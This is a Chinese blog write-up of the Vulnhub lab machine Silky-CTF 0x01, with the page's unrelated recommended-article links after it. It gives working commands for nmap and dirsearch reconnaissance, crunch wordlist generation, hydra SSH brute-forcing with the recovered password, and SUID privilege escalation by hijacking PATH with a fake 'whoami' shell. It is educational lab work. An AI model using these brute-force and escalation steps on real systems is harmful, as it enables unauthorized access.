Silky-CTF_0x01 WriteUP

最新推荐文章于 2024-07-25 18:08:40 发布
最新推荐文章于 2024-07-25 18:08:40 发布
阅读量215 收藏
点赞数
文章标签: 网络安全 web安全 计算机网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64664156/article/details/130174925
版权

百度网盘链接:https://pan.baidu.com/s/1l0vUQJxVSLLrTrBz73kglQ?pwd=9684 提取码:9684

从Vulnhub下载:

Silky-CTF: 0x01 ~ VulnHubSilky-CTF: 0x01, made by Silky. Download & walkthrough links are available.https://www.vulnhub.com/entry/silky-ctf-0x01,306/

信息收集

主机发现,靶机与kali为nat模式,使用nmap收集靶机IP

nmap -sP 192.168.242.0/24

 扫描端口及端口开放服务的版本

nmap -p- -sV 192.168.242.170

 开启80端口,对网站目录进行扫描,使用 -i 200是为了方便查看

dirsearch -u http://192.168.242.170 -i 200

访问网页

/index.html 但很可惜,这里没有任何直接的提示,另外一个也是如此。

 当访问robots.txt时,这里出现了一个/notes.txt,去看看有什么乾坤。

 出现了不知道什么语言的一句话。

 捣鼓翻译后,从德语翻译过来的最像一句提示。

当我回到主页查看其源代码时发现了一个script的链接

 查看后得到一字符串,这个应该就是上面所说的密码,但是少了后面两位。

 这里为节省时间,使用crunch生成一本密码字典

因为提示为删除了两位密码,所有我们规定死密码最短和最长为7,并且指定格式为s1lky后面接特殊字符和数字,将输出结果保存到skiltycft.txt文件

crunch 7 7 -t s1lKy^% >> skiltyctf.txt

用户名猜测是silky

 在端口扫描时,仍留22端口未利用,这里使用hydra及生成的密码字典来爆破其ssh

hydra -l silky -P skiltyctf.txt 192.168.242.170 ssh -t 20

获取ssh的用户名为silky密码为s1lky#5

ssh silky@192.168.242.170

 输入yes回车

提权

输入密码后成功登录,查看silky用户的权限,id=1000,是普通用户,查看是否有能提权的

find / -perm -u=s  -print 2>/dev/null

 

这里的/usr/bin/sky是一个二进制文件

 看了一个国外的博客表示这里要滥用PATH变量

silky@Silky-CTF:/usr/bin$ cd /tmp
silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ /usr/bin/sky

 flag🚩

提权成功cd根目录,得到flag。

壁炉边上的少年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BugKu-杂项(Misc)的部分Writeup(持续更新,直到刷完)
DG_s1mple
06-17 4932
MISC题的部分writeup(持续更新)1.签到题2.这是一张单纯的图片3.隐写4.telnet5.眼见非实(ISCCCTF)6.啊哒7.又一张图片,还单纯吗 用了些时间把BugKu里的Misc的解题思路和套路整理了一下,发出来分享 1.签到题 给了一张二维码,扫描关注就得到了flag 2.这是一张单纯的图片 题目给了一张图片,下载下来,然后用Winhex打开,发现末尾处有一段Unicode编码 key{y&amp
【Vulnhub系列】Vulnhub_Silky-CTF_0x02靶场渗透(原创)
Lusen的博客
07-27 1144
Vulnhub系列-Siky-CTF_0x02靶场做题记录
anti-wrinkle_Anti-wrinkle是什么意思
weixin_39647499的博客
12-19 1335
1. Each week, use this product in conjunction with Water Breath Sleeping Eye Mask and Biochemical Anti-Wrinkle Sleeping Eye Mask two to three times, these two eye masks can be used alternatively.每周配合使...
狗狗品种中英文翻译
山中有石为玉
07-05 2687
优达学城133种狗狗 001.Affenpinscher猴绠犬 002.Afghan_hound阿富汗猎犬 003.Airedale_terrier万能㹴 004.Akita秋田犬 005.Alaskan_malamute阿拉斯加犬 006.American_eskimo_dog爱斯基摩犬 007.American_foxhound猎狐犬 008.American_s...
定时器流水灯_keil_silky2j_
09-30
【定时器流水灯_keil_silky2j_】是一个基于单片机编程的项目,主要使用了Keil集成开发环境以及Silky2J开发板。这个项目的主要目的是通过编程实现LED流水灯的效果,这对于初学者来说是一个很好的实践案例,能够帮助...
silky-main.zip
11-29
The Silky framework is designed to help developers quickly build a microservice development framework through simple code and configuration under the .net platform
Silky-开源
04-30
注意:此代码自2005年以来未进行过更新。出于历史目的将其保留在... Silky是用于SILC(安全Internet实时会议)协议的安全聊天客户端。 该代码用C编写,并且GUI使用GTK工具包实现。 支持的操作系统包括Linux和Windows。
silky_2.11-1.0.13.zip
09-26
【Silky_2.11-1.0.13.zip】这个压缩包文件是针对Haxe编程语言与Scala交互的开源项目。Haxe是一种多平台的编程语言,它允许开发者编写一次代码,然后编译成多种目标平台,如JavaScript、C++、Java、PHP等。而Scala则...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8354
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
医疗器械上市欧美,需要什么样的网络安全相关申报文件?
网 安 云
07-25 511
医疗器械在欧美上市时,需要提交的网络安全相关申报文件主要包括网络安全管理计划、设计开发与维护流程、软件物料清单(SBOM)、网络安全风险评估报告、技术文档以及上市后监测计划等。内容:根据FDA的《医疗器械的网络安全指南:质量体系需考虑的因素和上市前需提交的材料》,制造商还需要提交其他与网络安全相关的文件,如网络安全风险评估报告、漏洞修复计划等。内容:制造商需要提交一份网络安全管理计划,该计划应包含在合理的时间内监控、识别并酌情解决上市后的网络安全漏洞和利用的策略,包括协调一致的漏洞披露和相关程序。
【论文速读】| MoRSE:利用检索增强生成技术填补网络安全专业知识的空白
m0_73736695的博客
07-25 526
本文介绍了MoRSE(Mixture of RAGs Security Experts),这是首个专为网络安全设计的AI聊天机器人。MoRSE利用两个并行工作的RAG(检索增强生成)系统,从多维网络安全背景中检索并组织信息。
网络安全相关竞赛比赛
黑战士的博客
07-18 1313
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1080
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1129
大语言模型提示注入攻击安全风险分析报告下载
安全与服务的双重奏:探究ISO20000和ISO27001的企业变革力量
xinbiao001的博客
07-25 949
ISO20000是一个面向机构的IT服务管理标准,旨在提供建立、实施、运作、监控、评审、维护和改进IT服务管理体系(ITSM)的模型。它主要关注的是IT服务管理的流程和质量,帮助企业建立高效的IT服务支持,确保IT服务与企业业务目标一致,提高信息技术服务和运营效率,控制IT风险及相关的成本。例如,华为技术有限公司就通过实施这两项体系,提高了内部IT信息安全管理规范,改善了员工对信息安全服务的认知,提升了品牌形象,并促进了与客户的关系。成功的关键在于管理层对这一过程的承诺,以及员工对标准和流程的认同和遵循。
JAW:一款针对客户端JavaScript的图形化安全分析框架
FreeBuf_的博客
07-25 1717
JAW是一款针对客户端JavaScript的图形化安全分析框架,该工具基于esprima解析器和EsTree SpiderMonkey Spec实现其功能,广大研究人员可以使用该工具分析Web应用程序和基于JavaScript的客户端程序的安全性。7、设计并执行定制的安全相关程序分析,包括预定义 JavaScript 源和接收器之间的数据流分析、控制流和可达性分析、利用 DOM 快照解析 DOM 查询选择器、通过抽象语法树 (AST) 进行模式匹配等;5、支持交互式检测或自动检测不安全的程序行为;
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
最新发布
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
深入探索Bash脚本艺术:Advanced Bash Scripting Guide
"Advanced Bash Scripting Guide - 一个深入探索Shell脚本艺术的完整指南,由Mendel Cooper撰写,适合初学者至中高级学习者,包含UNIX智慧和传统的编程概念,提供练习和详尽注释的例子以促进实践学习。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值